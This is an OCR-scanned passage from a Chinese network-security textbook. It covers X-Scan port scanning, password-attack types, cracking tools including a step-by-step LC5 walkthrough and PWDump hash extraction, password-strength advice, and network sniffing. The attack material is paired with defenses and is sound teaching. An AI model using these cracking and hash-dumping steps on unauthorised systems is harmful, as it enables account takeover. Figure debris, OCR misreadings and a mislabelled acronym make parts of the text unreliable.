图 3-1 X-Scan 的 主 界面 
使 用 X-Scan 进行 扫描 之 前 ， 可 以 设置 扫描 参数 。 选 择 “ 设 置 ” 一 “扫描 参数 ”菜单 
命令 ， 可 以 弹出 如 图 3-2 所 示 的 对 话 框 ， 在 “检测 范围 ”选项 卡 中 设置 要 进行 扫描 的 人 地 
址 范围 。 


SS 





.Sa 








3-2 ”扫描 参数 对 话 框 


在 “全 局 设置 ” 栏 的 “扫描 模块 ”选项 卡 中 可 以 设置 对 哪些 服务 进行 扫描 ， 如 图 3-3 
所 示 ; 在 “并 发 扫描 ”选项 卡 可 以 设置 最 大 并 发 主机 数 和 最 大 并 发 线程 数 ， 如 图 3-4 所 
示 ; 在 “扫描 报告 ”选项 卡 可 以 设置 扫描 结果 的 格式 和 报告 的 文件 名 ， 其 中 包 
括 .html、.txt、.xml 三 种 格式 ， 如 图 3-5 所 示 。 











图 3-3 ”扫描 模块 图 3-4 并 发 扫描 


到 
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在 “插件 设置 ” 栏 的 “端口 相关 设置 ”选项 卡 可 以 设置 需要 进行 扫描 的 端口 、 检 测 方 
式 (TCP 或 SYN) 等 ， 如 图 3-6 所 示 ; 还 可 以 对 “SNMP 相关 设置 ”“NETBIOS 相关 设置 
“漏洞 检测 脚本 设置 ”“CGI 相关 设置 ”“ 字 典 文件 设置 ”进行 设置 。 





IS| x 





CT 相关 设置 
字 奥 文件 设置 


图 3-6 端口 设置 


所 有 的 选项 都 设置 好 之 后 回 到 主 界面 ， 单 击 “ 启 动 扫 描 ” 按 钮 开始 进行 扫描 ， 如 图 3-7 
所 示 。 扫 描 结束 后 ， 会 生成 类 似 图 3-8 所 示 的 检测 报告 。 









































E -=|olz 
文件 (WJ 设置 (W) 查看 (工具 OO onguage 帮助 加 
主机 检测 结果 
Ee locahost | 发现 安全 漏洞 
] [Ea J] 
正在 加 载 漏洞 检测 脚本 | 
De | 机 分 析 :iocahost] 
[WE 主机 地 址 。 端口 /服务 | 服务 漏洞 | 
localhost https (443/tcp) 发 现 安全 提示 
1 司 localhost mcrosoft-ds (445jtcp) | 发 现 安全 警 省 
普通 信息 | 演 油 信息 | 履 识 信息 | localhost ftp (2ljtcp) | 发 现 安全 漏洞 
一 localhost smtp (25jtcp) 发 现 安全 提示 
Es 3 locahost ee 发 现 安全 提示 
了 localhost lunknown (8000/tcp) 发 现 安全 提示 
ee 到 localhost www (BOftcp) | 发 现 安全 提示 
图 3-7 启动 扫描 图 3-8 检测 报告 
通过 检测 报告 分 析 扫 描 的 结果 ， 获 得 有 用 的 信息 。 
3.2.3 防护 
可 以 采用 下 面 两 种 方法 防范 端口 扫描 。 


1. 关闭 闲置 和 有 潜在 危险 的 端口 


这 种 方法 的 本 质 是 将 所 有 用 户 需 要 用 到 的 正常 计算 机 端口 外 的 其 他 端口 都 关闭 。 因 为 
就 黑客 而 言 ， 所 有 的 端口 都 可 能 成 为 攻击 的 目标 。 即 计算 机 的 所 有 对 外 通信 端口 都 存在 潜 
在 的 危险 ， 而 一 些 系 统 必 要 的 通信 端口 ， 如 访问 网 页 需要 的 80 端口 (8TTP)、4000 端口 
(QQ) 等 不 能 被 关闭 。 

在 Windows NT 核心 系统 (Windows 2000/XP/2003) 中 要 关闭 一 些 闲置 端口 是 比较 方便 
的 ， 可 以 采用 “定向 关闭 指定 服务 的 端口 ”和 “只 开放 允许 端口 ”的 方式 。 计 算 机 的 一 些 
网 络 服 务 会 由 系统 分 配 默认 的 端口 ， 将 一 些 闲 置 的 服务 关闭 掉 ， 其 对 应 的 端口 也 会 被 关 
闭 了 。 
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2. 检查 各 端口 ， 有 端口 扫描 的 症状 时 ， 立 即 屏蔽 该 端口 


这 种 预防 端口 扫描 的 方式 通过 用 户 手 工 是 不 可 能 完成 的 ， 或 者 说 完成 起 来 相当 困难 。 
借助 的 软件 是 常用 的 网 络 防火 墙 。 

防火 墙 的 工作 原理 是 : 首先 检查 每 个 到 达 电脑 的 数据 包 ， 在 这 个 包 被 机 器 上 运行 的 任 
何 软件 看 到 之 前 ， 防 火 墙 有 完全 的 否决 权 ， 可 以 禁止 电脑 接收 Intemet 上 的 任何 东西 。 当 
第 一 个 请 求 建立 连接 的 包 被 电脑 回应 后 ， 一 个 TCP/IP 端口 被 打开 ; 端口 扫描 时 ， 对 方 计 
算 机 不 断 地 和 本 地 计算 机 建立 连接 ， 并 逐渐 打开 各 个 服务 所 对 应 的 TCP/IP 端口 及 闲置 端 
口 。 防 火 墙 利用 自 带 的 拦截 规则 判断 ， 就 能 够 知道 对 方 是 否 正 进行 端口 扫描 ， 并 拦截 掉 对 
方 发 送 过 来 的 所 有 扫描 需要 的 数据 包 。 


3.3 口令 攻击 
3.3.1 原理 


攻击 者 常常 把 破译 用 户 的 口令 作为 攻击 的 开始 。 只 要 攻击 者 能 猜测 或 者 确定 用 户 的 口 
令 ， 就 能 获得 机 器 或 者 网 络 的 访问 权 ， 并 能 访问 到 用 户 能 访问 到 的 任何 资源 。 如 果 这 个 用 
户 有 域 管理 员 或 root 用 户 权限 ， 这 是 极其 危险 的 。 

这 种 方法 的 前 提 是 必须 先 得 到 该 主机 上 的 某 个 合法 用 户 的 账号 ， 然 后 再 进行 合法 用 户 
口令 的 破译 。 获 得 普通 用 户 账号 的 方法 很 多 。 

(1) 利用 目标 主机 的 Finger 功能 ， 当 用 Finger 命令 查询 时 ， 主 机 系统 会 将 保存 的 用 户 
资料 (如 用 户 名 、 登 录 时 间 等 ) 显 示 在 终端 或 计算 机 上 。 

(2) 利用 目标 主机 的 X.500 服务 ， 有些 主 机 没有 关闭 X.500 的 目录 查询 服务 ， 也 给 攻 
击 者 提供 了 获得 信息 的 一 条 简易 途径 。 

(3) 从 电子 邮件 地 址 中 收集 由 于 有 些 用 户 电 子 邮 件 地 址 常会 透露 其 在 目标 主机 上 的 
账号 ， 通 过 查看 主机 是 否 有 习惯 性 的 账号 ， 造 成 账号 的 泄露 。 

(4) 通过 网 络 监听 非法 得 到 用 户口 令 : 这 个 方法 有 一 定 的 局 限 性 ， 但 危害 性 极 大 。 监 
听 者 往往 采用 中 途 截击 的 方法 ， 也 是 获取 用 户 账 户 和 密码 的 一 条 有 效 途 径 。 当 前 ， 很 多 协 
议 根 本 就 没有 采用 加 密 或 身份 认证 技术 ， 如 在 Telnet、FTP、HTTP、SMTP 等 传输 协议 
中 ， 用 户 账户 和 密码 信息 都 是 以 明文 格式 传输 的 ， 此 时 攻击 者 利用 数据 包 截 取 工具 便 可 很 
容易 收集 到 账户 和 密码 。 还 有 一 种 中 途 截击 攻击 方法 ， 它 在 用 户 同 服务 器 端 完成 “三 次 握 
手 ” 建 立 连接 之 后 ， 在 通信 过 程 中 扮演 “第 三 者 ”的 角色 ， 假 冒 服务 器 身份 欺骗 用 户 ， 再 
假冒 用 户 向 服务 器 发 出 恶意 请 求 ， 其 造成 的 后 果 不 堪 设 想 。 另 外 ， 攻 击 者 有 时 还 会 利用 软 
件 和 硬件 工具 时 刻 监 视 系 统 主机 的 工作 ， 等 待 记 录用 户 登 录 信息 ， 从 而 取得 用 户 密码 ; 或 
者 编制 有 缓冲 区 溢出 错误 的 SUID 程序 来 获得 超级 用 户 权限 。 

(5) 在 知道 用 户 的 账号 后 (如 电子 邮件 @ 前 面 的 部 分 ) 利 用 一 些 专门 软件 强行 破解 用 户口 
令 : 这 种 方法 不 受 网 段 限制 ， 但 攻击 者 要 有 足够 的 耐心 和 时 间 。 如 采用 字典 穷 举 法 (或 称 暴 
力 法 ) 来 破解 用 户 的 密码 时 ， 攻 击 者 可 以 通过 一 些 工具 程序 ， 自 动 地 从 电脑 字典 中 取出 一 个 
单词 ， 作 为 用 户 的 口令 ， 再 输入 到 远 端 的 主机 ， 申 请 进入 系统 ; 若 口令 错误 ， 就 按 序 取出 
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下 一 个 单词 ， 进 行 下 一 个 尝试 ， 并 一 直 循环 下 去 ， 直 到 找到 正确 的 口令 或 字典 的 单词 试 完 
为 止 。 由 于 这 个 破译 过 程 由 计算 机 程序 来 自动 完成 ， 因 而 几 个 小 时 就 可 以 把 上 十 万 条 记录 
的 字典 里 所 有 单词 都 尝试 一 遍 。 

(6) 利用 系统 管理 员 的 失误 : 在 Unix 操作 系统 中 ， 用 户 的 基本 信息 存放 在 passwd 文 
件 中 ， 而 所 有 的 口令 则 经 过 DES 加 密 方法 加 密 后 专门 存放 在 一 个 叫 shadow 的 文件 中 。 黑 
客 们 获取 口令 文件 后 ， 就 会 使 用 专门 的 破解 DES 加 密 法 的 程序 来 解 口令 。 同 时 ， 由 于 各 种 
操作 系统 都 存在 许多 安全 漏洞 、Bug 或 一 些 其 他 设计 缺陷 ， 这 些 缺 陷 一 旦 被 找 出 ， 黑 客 就 
可 以 长 驱 直 入 。 特 洛 伊 木马 程序 可 以 直接 侵入 用 户 的 电脑 并 进行 破坏 ， 它 常 被 伪装 成 工具 
程序 或 者 游戏 等 诱 使 用 户 打开 带 有 特洛伊 木马 程序 的 邮件 附件 或 从 网 上 直接 下 载 。 一 旦 用 
户 打开 了 这 些 邮件 的 附件 或 者 执行 了 这 些 程序 ， 它 们 就 会 像 古 特洛伊 人 在 敌人 城 外 留 下 的 
藏 满 士兵 的 木马 一 样 留 在 自己 的 电脑 中 ， 并 在 自己 的 计算 机 系统 中 隐藏 一 个 可 以 在 
Windows 启动 时 悄悄 执行 的 程序 。 当 计算 机 连接 到 因特网 上 时 ， 这 个 程序 就 会 报告 机 器 的 
JP 地 址 以 及 预先 设 定 的 端口 。 攻 击 者 收 到 这 些 信息 后 ， 再 利用 这 个 潜伏 在 其 中 的 程序 ， 就 
可 以 任意 地 修改 计算 机 的 参数 、 复 制 文 件 、 窥 视 硬盘 中 的 内 容 ， 从 而 达到 控制 计算 机 的 
目的 。 


【知识 链接 一 一 DES】 


DES 全 称 为 Data Encryption Standard， 即 数据 加 密 标准 ， 是 一 种 使 用 密 钥 加 密 的 块 算 
法 ，1977 年 被 美国 联邦 政府 的 国家 标准 局 确定 为 联邦 资料 处 理 标准 (FIPS)， 并 授权 在 非 密 
级 政府 通信 中 使 用 ， 随 后 该 算法 在 国际 上 广泛 流传 开 来 。 需 要 注意 的 是 ， 在 某 些 文献 中 ， 
作为 算法 的 DES 称 为 数据 加 密 算法 (Data Encryption Algorithm，DSA)， 要 与 作为 标准 的 
DES 区 分 开 来 。 


3.3.2 类 型 


(1) 社会 工程 学 (Social Engineering)。 通 过 人 际 交往 这 一 非 技术 手段 以 欺骗 、 套 取 的 方 
式 来 获得 口令 。 避 免 此 类 攻击 的 对 策 是 加 强 用 户 意识 。 


【知识 链接 一 一 社会 工程 学 】 
社会 工程 学 是 黑客 米 特 尼克 在 《欺骗 的 艺术 》 中 所 提出 ， 但 其 初始 目的 是 让 全 球 的 网 
民 们 能 够 懂得 网 络 安全 ， 提 高 警惕 ， 防 止 没 必要 的 个 人 损失 。 但 在 我 国 ， 黑 客 集体 中 还 在 
不 断 使 用 这 种 手段 欺骗 无 知 网 民 制 造 违 法 行为 ， 社 会 影响 恶劣 ， 一 直 受 到 公安 机 关 的 严厉 打 
击 。 一 切 使 用 黑客 技术 犯罪 的 行为 都 将 受到 法 律 严厉 制裁 ， 请 读者 慎 用 这 把 “ 双 刃 剑 ”。 


(2) 猜测 攻击 。 使 用 口令 猜测 程序 进行 攻击 。 口 令 猜测 程序 往往 根据 用 户 定义 口令 的 
习惯 猜测 用 户口 令 ， 如 名 字 缩写 、 生 日 、 宠 物 名 、 部 门 名 等 。 在 详细 了 解 用 户 的 社会 背景 
之 后 ， 黑 客 可 以 列举 出 几 百 种 可 能 的 口令 ， 并 在 很 短 的 时 间 内 完成 猜测 攻击 。 

(3) 字典 攻击 。 入 侵 者 对 所 有 英文 单词 进行 尝试 ， 程 序 将 按 序 取出 一 个 又 一 个 的 单 
词 ， 进 行 一 次 又 一 次 尝试 ， 直 到 成 功 。 据 有 的 传媒 报道 ， 对 于 一 个 有 8 万 个 英文 单词 的 集 
合 来 说 ， 入 侵 者 不 到 一 分 半 钟 就 可 试 完 。 所 以 ， 如 果 用 户 的 口令 不 太 长 或 者 是 单词 、 短 
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语 ， 很 快 就 会 被 破译 出 来 。 

(4) 穷 举 攻击 。 一 般 从 长 度 为 1 的 口令 开始 ， 按 长 度 递增 进行 尝试 攻击 。 由 于 人 们 往 
往 偏爱 简单 易 记 的 口令 ， 穷 举 攻击 的 成 功率 很 高 。 如 果 每 千 分 之 一 秒 检查 一 个 口令 ， 那 么 
86% 的 口令 可 以 在 一 周 内 破译 出 来 。 

(5) 混合 攻击 。 结 合 了 字典 攻击 和 穷 举 攻击 ， 先 字典 攻击 ， 再 穷 举 攻击 。 

(6) 直接 破解 系统 口令 文件 。 入 侵 者 寻找 目标 主机 的 安全 漏洞 和 薄弱 环节 ， 伺 机 偷 走 
存放 系统 口令 的 文件 ， 然 后 破译 加 密 的 口令 ， 以 便 冒 充 合法 用 户 访问 主机 。 

(7) 网 络 嗅 探 (SniffenD) 。 通 过 嗅 探 器 在 局 域 网 内 嗅 探 明 文 传输 的 口令 字符 串 。 避 免 此 类 
攻击 的 对 策 是 网 络 传输 采用 加 密 方式 。 

(8) 键盘 记录 。 在 目标 系统 中 安装 键盘 记录 后 门 ， 记 录 操 作 员 输入 的 口令 字符 串 。 

(9) 其 他 攻击 方式 。 如 中 间 人 攻击 、 重 放 攻 击 、 生 日 攻击 、 时 间 攻 击 、 偷 窥 攻 击 。 


3.3.3 工具 


1. NT 口令 破解 程序 


1) LOphtcrack 

LOphtcrack 是 一 个 NT 口令 审计 工具 ， 能 根据 操作 系统 中 存储 的 加 密 哈 希 计 算 NT 口 
令 ， 功 能 非常 强大 、 丰 富 ， 是 目前 市 面 上 最 好 的 NT 口令 破解 程序 之 一 。 它 有 3 种 方式 可 
以 破解 口令 : 词典 攻击 、 组 合 攻击 、 强 行 攻击 。LOphtcrack 不 仅 有 一 个 美观 、 容 易 使 用 的 
GUI， 而 且 利 用 了 NT 的 两 个 实际 缺陷 ， 这 使 得 LOphtcrack 速度 奇 快 。 

下 面 以 LC5 为 例 说 明 该 软件 的 使 用 方法 。 在 LC5 主 界面 中 ， 选 择 “文件 ”一 “LC5 
向 导 ” 菜 单 命令 ， 打 开 LC5 向 导 界 面 。 单 击 “ 下 一 步 ” 按 钮 ， 打 开 取得 加 密 口 令 界面 。 这 
时 有 4 个 选项 ， 选 择 “从 本 地 机 器 导入 ”选项 ， 再 单 击 “ 下 一 步 ” 按 钮 。 这 个 界面 有 4 个 
选项 ， 如 果 密 码 比较 简单 ， 可 以 选择 “快速 口令 破解 ”选项 ;如 果 密 码 比较 复杂 ， 选 择 
“ 自 定义 ”选项 ， 如 图 3-9 所 示 。 


se Auditing Method 





攻 上 一 步 四 | 下 一 步 中 > 取消 
图 3-9 选择 破解 方法 


/se\. 
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单 击 “ 自 定义 选项 ”按钮 ， 出 现 “ 自 定义 破解 选项 ”界面 (此 功能 使 用 前 需要 使 用 注册 
机 对 软件 LC5 进行 注册 )。 在 该 界面 做 适当 的 设置 ， 如 图 3-10 所 示 。 
破解 成 功 得 到 操作 系统 的 密码 ， 如 图 3-11 所 示 。 


126. con - [无 标题 4] 。 属 操 | 区] 


二 AsTe 训 数字 或 符 


人 使 用 “预定 散 列 "破解 口令 

















此 破解 方法 只 对 Windows LI 认证 口令 有效. 














图 3-10 “ 自 定义 破解 选项 ”界面 图 3-11 破解 成 功 


2) NTSweep 

NTSweep 使 用 的 方法 和 其 他 口令 破解 程序 不 同 ， 它 是 利用 了 Microsoft 允许 用 户 改变 
口令 的 机 制 。NTSweep 首先 取 定 一 个 单词 ， 并 将 这 个 单词 作为 账号 的 原始 口令 并 试图 把 用 
户 的 口令 改 为 同一 个 单词 。 如 果 主 域 控制 机 器 返回 失败 信息 ， 就 可 知道 这 不 是 原来 的 口 
令 。 反 之 如 果 返 回 成 功 信息 ， 就 说 明 这 一 定 是 账号 的 口令 。 因 为 成 功 地 把 口令 改 成 原来 的 
值 ， 用 户 永远 不 会 知道 口令 曾经 被 人 修改 过 。 

NTSweep 非常 有 用 ， 因 为 它 能 通过 防火 墙 ， 也 不 需要 任何 特殊 权限 来 运行 。 但 是 也 有 
缺点 ， 首 先 运行 起 来 较 慢 ， 其 次 尝试 修改 口令 并 失败 的 信息 会 被 记录 下 来 ， 能 被 管理 员 检 
测 到 ， 最 后 ， 使 用 这 种 技术 的 猜测 程序 不 给 出 精确 信息 ， 如 有 些 情况 不 准 用 户 更 改口 令 ， 
即使 口令 是 正确 的 ， 这 时 程序 也 会 返回 失败 信息 。 

3) NTCrack 

NTCrack 是 UNIX 破解 程序 的 一 部 分 ， 但 是 在 NT 环境 下 破解 。NTCrack 与 UNIX 中 
的 破解 类 似 ， 但 是 NTCrack 在 功能 上 非常 有 限 。 它 不 像 其 他 程序 一 样 提取 口令 哈 希 ， 它 和 
NTSweep 的 工作 原理 类 似 。 必 须 给 NTCrack 一 个 user id 和 要 测试 的 口令 组 合 ， 然 后 程序 
会 告诉 用 户 是 否 成 功 。 

4) PWDump 

PWDump 不 是 一 个 口令 破解 程序 ， 但 是 它 能 用 来 从 SAM 数据 库 中 提取 口令 哈 希 。 
LOphtcrack 已 经 内 建 了 这 个 特征 ， 但 是 PWDump 还 是 很 有 用 的 。 首 先 ， 它 是 一 个 小 型 的 、 
易 使 用 的 命令 行 工具 ， 能 提取 口令 哈 希 ， 其 次 ， 目 前 很 多 情况 下 LOphtcrack 不 能 提取 口令 
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哈 希 。 如 SYSTEM 是 一 个 能 在 NT 下 运行 的 程序 ， 为 SAM 数据 库 提供 了 很 强 的 加 密 功 
能 ， 如 果 SYSTEM 在 使 用 ，LOphtcrack 就 无 法 提取 哈 希 口令 ， 但 是 PWDump 还 能 使 用 ; 
要 在 Windows 2000 下 提取 哈 希 口令 ， 必 须 使 用 PWDump， 因 为 系统 使 用 了 更 强 的 加 密 模 
式 来 保护 信息 。 


2. UNIX 口令 破解 程序 


1) Crack 

Crack 是 一 个 旨 在 快速 定位 UNIX 口令 弱点 的 口令 破解 程序 。Crack 使 用 标准 的 猜测 技 
术 确定 口令 。 它 检查 口令 是 否 为 如 下 情况 之 一 : 和 user ID 相同 、 单 词 、 数 字 串 、 字 母 
串 。Crack 加 密 一 长 串 可 能 的 口令 ， 并 把 结果 和 用 户 的 加 密 口 令 相 比较 ， 看 其 是 否 匹 配 。 
用 户 的 加 密 口令 必须 是 在 运行 破解 程序 之 前 就 已 经 提供 的 。 

2) John the Ripper 

它 是 UNIX 口令 破解 程序 ， 但 也 能 在 Windows 平台 运行 ， 功 能 强大 、 运 行 速度 快 ， 可 
进行 字典 攻击 和 强行 攻击 。 

3) XIT 

XIT 是 一 个 执行 词典 攻击 的 UNIX 口令 破解 程序 。XIT 的 功能 有 限 ， 因 为 它 只 能 进行 
词典 攻击 ， 但 程序 很 小 、 运 行 很 快 。 

4) Slurpie 

Slurpie 能 执行 词典 攻击 和 定制 的 强行 攻击 ， 但 规定 所 需要 使 用 的 字符 数目 和 字符 类 
型 。Slurpie 使 用 7 字符 或 8 字符 、 仅 使 用 小 写字 母 口令 进行 强行 攻击 。Slurpie 最 大 的 优 
点 是 它 能 分 布 运行 ， 它 能 把 几 台 计算 机 组 成 一 台 分 布 式 虚 拟 机 ， 在 很 短 的 时 间 里 完成 破解 
任务 。 


3.3.4 防护 


要 有 效 防范 口令 攻击 ， 需 选择 一 个 好 口令 ， 并 且 要 注意 保护 口令 的 安全 。 

好 口令 是 防范 口令 攻击 的 最 基本 、 最 有 效 的 方法 。 

最 好 采用 字母 、 数 字 、 标 点 符号 、 特 殊 字符 的 组 合 ， 同 时 有 大 小 写字 母 ， 长 度 8 个 以 
上 ， 容 易 记 忆 。 不 必 把 口令 写 下 来 ， 绝 对 不 要 用 自己 或 亲友 的 生日 、 手 机 号 码 等 易于 被 他 
人 获知 的 信息 作 密 码 。 


【知识 链接 一 一 弱 口 令 】 
弱 口 令 (weak password) 没有 严格 和 准确 的 定义 ， 通 常 认为 容易 被 别人 (他 们 有 可 能 对 
你 很 了 解 ) 猜 测 到 或 被 破解 工具 破解 的 口令 均 为 弱 口 令 。 仅 包含 简单 数字 和 字母 的 口令 ， 例 
如 123、abc 等 ， 很 容易 被 别人 破解 ， 从 而 使 用 户 的 计算 机 面临 风险 ， 因 此 不 推荐 用 户 使 用 。 


请 看 下 面 这 些 口令 : 


admin 
123456 
19790101 
13800138000 
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每 个 人 都 会 认同 类 似 上 面 的 口令 不 安全 。 

再 看 下 面 这 些 口 令 : 

AiP (jigloi092 

Pj%^];jie20ww 

上 面 这 两 个 口令 肯定 很 难 破解 ， 但 是 对 于 使 用 者 来 说 ， 同 样 很 难 记 住 ， 只 能 把 口令 记 
在 纸 上 。 一 旦 记录 口令 的 纸 被 人 发 现 ， 那 么 就 成 为 众所周知 的 口令 ， 这 比 破解 一 个 典型 的 
口令 更 容易 。 

再 看 下 面 这 些 口 令 : 

LLagoTislK (Long Long ago,There is a king) 

FSand7Yago (Four Score and seven years ago) 

上 面 这 两 个 口令 是 一 句 话 的 缩写 ， 很 难 破解 ， 同 时 对 于 使 用 者 来 说 又 方便 记忆 ， 因 此 
类 似 这 样 的 口令 是 比较 合适 的 口令 。 

不 要 将 口令 记 在 纸 上 或 存储 于 计算 机 文件 中 ; 最 好 不 要 告诉 别人 你 的 口令 ， 不 要 在 不 
同 的 系统 中 使 用 相同 的 口令 ;在 输入 口令 时 应 确保 无 人 在 身边 窥视 ， 在 公共 上 网 场所 最 好 
先 确认 系统 是 否 安 全 ， 定 期 更 改口 令 ， 至 少 6 个 月 更 改 一 次 ， 这 会 将 遭受 口令 攻击 的 风险 
降 到 最 低 。 


3.4 网 络 监 听 
3.4.1 原理 


通常 ， 在 计算 机 网 络 上 交换 的 数据 结构 单位 是 数据 包 ， 而 在 以 太 网 (Ethemeb 中 则 称 为 
帧 。 这 种 数据 包 是 由 记录 着 数据 包 发 送 给 对 方 所 必需 信息 的 报头 部 分 和 记录 着 发 送信 息 的 
报 文部 分 构成 。 报 头 部 分 包含 接收 端 地 址 、 发 送 端 地 址 、 数 据 校 验 码 等 信息 。 以 太 网 协议 
的 工作 方式 是 将 要 发 送 的 数据 包 发 往 连接 在 一 起 的 所 有 主机 。 通 常 只 有 与 数据 包 中 目标 地 
址 一 致 的 那 台 主机 才能 接收 到 信息 包 。 但 是 当主 机 工作 在 监听 模式 下 ， 不 管 数据 包 中 目标 
地 址 是 什么 ， 主 机 都 可 以 接收 到 。 在 许多 局 域 网 内 ， 有 十 几 台 甚至 上 百 台 主机 是 通过 双 绞 
线 、 交 换 机 连接 在 一 起 的 。 在 协议 的 高 层 或 者 用 户 看 来 ， 当 同一 网 络 中 的 2 台 主 机 通信 的 
时 候 ， 源 主机 将 写 有 目的 主机 地 址 的 数据 包 直接 发 向 目的 主机 ， 当 网 络 中 的 一 台 主机 同 外 
界 的 主机 通信 时 ， 源 主机 将 写 有 目的 主机 人 P 地 址 的 数据 包 发 向 网 关 。 但 这 种 数据 包 并 不 能 
在 协议 栈 的 高 层 直接 发 送出 去 ， 要 发 送 的 数据 包 必 须 从 TCP/IP 协议 的 也 层 交 给 网 络 接 
口 ， 也 就 是 所 说 的 数据 链 路 层 。 网 络 接口 不 会 识别 IP 地 址 。 在 网 络 接口 ， 从 IP 层 来 的 带 
有 卫 地 址 的 数据 包 又 增加 了 一 部 分 以 太 帧 的 帧 头 信息 。 在 帧 头 中 ， 有 2 个 域 分 别 为 只 有 网 
络 接口 才能 识别 的 源 主机 和 目的 主机 的 物理 地 址 ， 这 是 一 个 48 位 的 地 址 ， 与 IP 地 址 相对 
应 ， 即 一 个 了 P 地 址 对 应 一 个 物理 地 址 。 对 于 作为 网 关 的 主机 ， 由 于 它 连接 了 多 个 网 络 ， 也 
就 同时 具备 了 多 个 人 P 地 址 ， 在 每 个 网 络 中 都 有 一 个 。 而 发 向 网 络 外 的 帧 中 携带 的 就 是 网 关 
的 物理 地 址 。 
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在 Ethemet 中 填写 了 物理 地 址 的 帧 从 网 络 接口 ， 即 网 卡 中 发 送出 去 并 传送 到 物理 线路 
上 。 如 果 局 域 网 是 由 粗 缆 (10Base5) 或 细 缆 (10Base2) 连 接 的 共享 式 以 太 网 络 ， 那 么 数字 信号 
在 电缆 上 传输 时 就 能 够 到 达 线 路 上 的 每 台 主机 。 而 当 使 用 交换 机 时 ， 发 送出 去 的 信号 先 到 
达 集 线 器 ， 再 由 交换 机 发 向 连接 在 交换 机 上 的 每 条 线路 ， 这 样 在 物理 线路 上 传输 的 数字 信 
号 就 能 到 达 连 接 在 交换 机 上 的 每 台 主 机 了 。 当 数字 信号 到 达 一 台 主 机 的 网 络 接口 时 ， 正 常 
状态 下 网 络 接口 对 读 入 数据 帧 进行 检查 ， 如 果 数 据 帧 中 携带 的 物理 地 址 是 自己 的 或 者 物 
理 地 址 是 广播 地 址 ， 那 么 就 会 将 数据 帧 交 给 IP 层 软件 。 对 于 每 个 到 达 网 络 接口 的 数据 帧 ， 
都 要 重复 这 个 过 程 。 但 是 当主 机 工作 在 监听 模式 时 ， 所 有 的 数据 帧 都 将 被 交 给 上 层 协议 
软件 处 理 。 

当 连 接 在 同一 条 电缆 或 交换 机 上 的 主机 被 逻辑 地 分 为 几 个 子 网 时 ， 如 果 有 一 台 主 机 处 
于 监听 模式 ， 它 还 可 以 接收 到 发 向 与 自己 不 在 同一 个 子 网 (使 用 了 不 同 的 掩 码 、IP 地 址 和 
网 关 ) 的 主机 的 数据 包 ， 在 同一 个 物理 信道 上 传输 的 所 有 信息 都 可 以 被 接收 到 。 

在 UNIX 系统 上 ， 当 拥有 超级 权限 的 用 户 欲 使 自己 控制 的 主机 进入 监听 模式 ， 只 需 向 
JInterface( 网 络 接口 ) 发 送 IO 控制 命令 。 而 在 Windows 系统 中 ， 则 不 论 用 户 是 否 有 权限 ， 都 
可 以 通过 直接 运行 监听 工具 实现 。 

在 网 络 监听 时 ， 常 常 要 保存 大 量 的 信息 (也 包含 很 多 垃圾 信息 )， 并 对 收集 的 大 量 信息 
进行 整理 ， 这 样 就 会 使 正在 监听 的 机 器 对 其 他 用 户 的 请 求 响应 变 得 很 慢 。 同 时 监听 程序 在 
运行 时 需要 消耗 大 量 的 处 理 器 时 间 ， 如 果 此 时 就 详细 分 析 包 中 内 容 ， 许 多 包 就 会 来 不 及 接 
收 而 漏 走 。 所 以 很 多 时 候 监听 程序 会 将 监听 得 到 的 包 存放 在 文件 中 等 待 以 后 分 析 。 分 析 监 
听 到 的 数据 包 是 项 繁重 的 工作 ， 因 为 网 络 中 的 数据 包 都 非常 复杂 。2 台 主 机 之 间 连 续 发 送 
和 接收 数据 包 ， 在 监听 到 的 结果 中 必然 会 增加 一 些 别 的 主机 的 交互 数据 包 。 监 听 程序 将 同 
一 TCP 会 话 的 包 整 理 到 一 起 已 相当 不 易 ， 若 还 期 望 将 用 户 详细 信息 整理 出 来 ， 就 需要 根据 
协议 对 包 进 行 大 量 分 析 。Intemet 上 的 协议 非常 多 ， 运 行 监听 程序 将 会 使 机 器 变 得 很 慢 且 占 
用 大 量 磁盘 空间 以 存储 监听 到 的 数据 包 。 

现在 网 络 中 所 使 用 的 协议 都 是 较 早 前 设计 的 ， 许 多 协议 的 实现 都 是 基于 通信 双方 的 充 
分 信任 。 在 通常 的 网 络 环境 下 ， 用 户 的 信息 包括 口令 都 是 以 明文 的 方式 在 网 上 传输 的 ， 因 
此 进行 网 络 监听 从 而 获得 用 户 信息 并 不 难 ， 只 要 掌握 初步 TCP/IP 协议 知识 即 可 轻松 监听 
到 所 需 信 息 。 目 前 ， 网 络 监听 主要 用 于 局 域 网 络 ， 在 广域网 里 也 可 以 监听 和 截获 到 一 些 用 
户 信息 ， 但 更 多 信息 的 截获 要 依赖 于 配备 专用 接口 的 专用 工具 。 


3.4.2 工具 


在 Windows 环境 下 ， 常 用 的 网 络 监 听 工 具有 Sniffer 和 Wireshark。 在 UNIX 环境 下 ， 
常用 的 监听 工具 有 Sniffit、Snoop、Tcpdump、Dsniff 等 。 

Sniffer 中 文 可 以 翻译 为 嗅 探 器 ， 是 一 种 基于 被 动 侦 听 原理 的 网 络 分 析 方 式 。 使 用 这 种 
技术 方式 ， 可 以 监视 网 络 的 状态 、 数 据 流动 情况 以 及 网 络 上 传输 的 信息 。Sniffer 分 为 软件 
和 硬件 两 种 。 软 件 的 Sniffer 有 Sniffer Pro、Network Monitor、PacketBone 等 ， 其 优点 是 易 
于 安装 部 署 ， 易 于 学 习 使 用 ， 同 时 也 易于 交流 ; 缺点 是 无 法 抓 取 网 络 上 所 有 的 传输 ， 某 些 
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情况 下 也 就 无 法 真正 了 解 网 络 的 故障 和 运行 情况 。 硬 件 的 Sniffer 通常 称 为 协议 分 析 仪 ， 一 
般 都 是 商业 性 的 ， 价 格 也 比较 昂贵 ， 但 会 具备 支持 各 类 扩展 的 链 路 捕获 能 力 以 及 高 性 能 的 
数据 实时 捕获 分 析 的 功能 。 

Sniffer Pro 软件 是 NAI 公司 推出 的 一 款 一 流 的 便携 式 网 管 和 应 用 故障 诊断 分 析 软 件 ， 
不 管 是 在 有 线 网 络 还 是 在 无 线 网 络 中 ， 它 都 能 够 给 予 网 络 管理 人 员 实 时 的 网 络 监视 、 数 据 
包 捕获 以 及 故障 诊断 分 析 能 力 。 基 于 便携 式 软件 的 解决 方案 具备 最 高 的 性 价 比 ， 却 能 够 让 
用 户 获 得 强大 的 网 管 和 应 用 故障 诊断 功能 。 

Sniffer Pro 的 主要 功能 有 : 捕获 网 络 流量 进行 详细 分 析 ( 报 文 捕获 )、 利 用 专家 分 析 系 统 
